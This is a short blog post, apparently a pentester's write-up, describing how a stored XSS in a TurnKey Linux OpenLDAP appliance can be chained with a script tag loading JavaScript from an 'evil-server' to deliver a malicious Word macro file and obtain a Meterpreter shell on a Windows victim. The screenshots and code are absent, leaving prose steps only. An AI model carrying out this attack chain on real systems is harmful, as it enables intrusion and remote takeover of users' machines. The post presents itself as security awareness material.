czwartek, 4 października 2018

OpenLDAP - from XSS to RCE

Today I was using OpenLDAP VM from TurnKeyLinux (version 1.2.3 - available here). After I found some small bug (postauth stored XSS) I was wondering how can I use it during my 'pentest'. Below you will find an example.

Here we go...

When you're ready:


We can log in as admin and go directly to the place vulnerable to injection attack:


After reading this link you will be ready to create the poc-file and prepare meterpreter:

Checking:


Ok, payload-file is prepared. I moved checkme2.docm file to /var/www/html (but you can use python -m SimpleHTTPServer as well). So we are here:


To deliver our MSWord file to the victim user I will use very well known 'payload' to inject our JS code to OpenLDAP - we will use SCRIPT tag with SRC. But first - the bug. We can 'check' if our 'scenario' is possible for example here:


In our 'normal' cases ;) we should see some alert() message box. This time we will use checkme2.docm. Let's go to the new aliases, associated domains:


Code for persistent XSS (script src to evilsrv/checkme.js) should be added here.

Now I switched the window to VM with my Windows7.

When you will add our XSS-example-code you will see the traffic to 'evil-server' (left):


As you can see, we can save or open the file. So payload ('redirect') works. If you want to go to the next stage of this example - you should use a 'vulnerable' browser ;D

Why - because in 'default mode' (in my case: for Windows7 Pro) IE will not download this file automatically. We need to change security settings for the browser (to be more 'vulnerable' ;)) :


Good enough for the educational purposes. ;]

I decided to save the file and then open it (from explorer c:\downloads\ and so on ):

When I opened the file, there was few more requests to my 'evil-server':


Cool :) So we are here:


Checking shell:


It's not something sophisticated but as you can see it can be used to raise awareness about XSS attacks and how to mitigate them.

Maybe you will find it useful.

Cheers


Brak komentarzy:

Prześlij komentarz